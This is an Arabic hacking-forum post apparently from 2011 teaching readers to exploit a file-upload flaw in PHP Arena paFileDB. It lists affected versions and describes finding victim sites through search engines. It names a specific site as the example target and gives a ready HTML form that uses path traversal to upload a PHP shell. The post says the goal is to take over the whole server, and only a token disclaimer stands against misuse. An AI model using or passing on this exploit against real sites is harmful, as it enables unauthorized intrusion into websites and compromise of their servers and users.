e.-.m.-.p.-.o
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

e.-.m.-.p.-.o

h.-.a.-.c.-.k.-.e.-.r e..m..p..o
 
الرئيسيةأحدث الصورالتسجيلدخول
اول منتدى متخصص للهاكر بكل انواعه........ قسم خاص بالميتا اسبوليت........ قسم خاص بالباك تراك........ قسم خاص ببرامج اختراق الاجهزه ........ قسم خاص ببرامج اختراق المحادثات........ قسم خاص ببرامج اختراق المواقع والمنتديات

 

 تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB

اذهب الى الأسفل 
كاتب الموضوعرسالة
e.-.m.-.p.-.o
Admin
e.-.m.-.p.-.o


المساهمات : 81
تاريخ التسجيل : 06/03/2011

تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB Empty
مُساهمةموضوع: تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB   تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB Icon_minitimeالأربعاء مارس 09, 2011 6:30 am


((أرجوا عدم استخدام الثغرة في الحرام ألا هل بلغت اللهم اشهد))

شرح ثغرة
PHP Arena paFileDB
وأستغلالها.
============
الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
============
(البرامج المصابه)
PHP Arena paFileDB 1.1.3
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 3.1
============
أذهب إلى أي محرك بحث منثل جوجل
وأكتب أيا من البرامج السابقة مثلا:
PHP Arena paFileDB 3.1
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
http://www.truez.com/download
نضيف عليه هالوصلة:
includes/team/file.php
ليصبح:
http://www.truez.com/download/includes/team/file.php
الأن ضع اللنك في المتصفح وأضغط أنتر:
إذا طلع لك هكذا
[ ] - [ ] - [ ]
يعني الموقع مصاب بالثغرة.
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
======================
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/tea m/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
======================
مع مراعاة تغيير:
http://www.truez.com/download/includes/team/file.php
إلى الموقع المصاب.
و
777.php
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار
الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف
إلى الموقع عن طريق الثغرة.
ويمكننا أستعراضه من هذا اللنك:
http://www.truez.com/download/uploads/777.php
------------------------------------------------------------------------------
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://hackermoop.yoo7.com
 
تعلم ترفع أي ملف لموقع فيه ثغرة PHP Arena paFileDB
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» شرح ثغرة حلوه في منتديات MyBulletin
» تعلم فن اليد في مداعبة زوجتك بالصو
» الحماآية من التعديل على برناآمجك .. وسرقته تعلم كيف تحمى برنامجك

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
e.-.m.-.p.-.o :: الفئة الأولى :: ركن اختراق المواقع والمنتديات بــــــــ الثغرات والبرامج-
انتقل الى: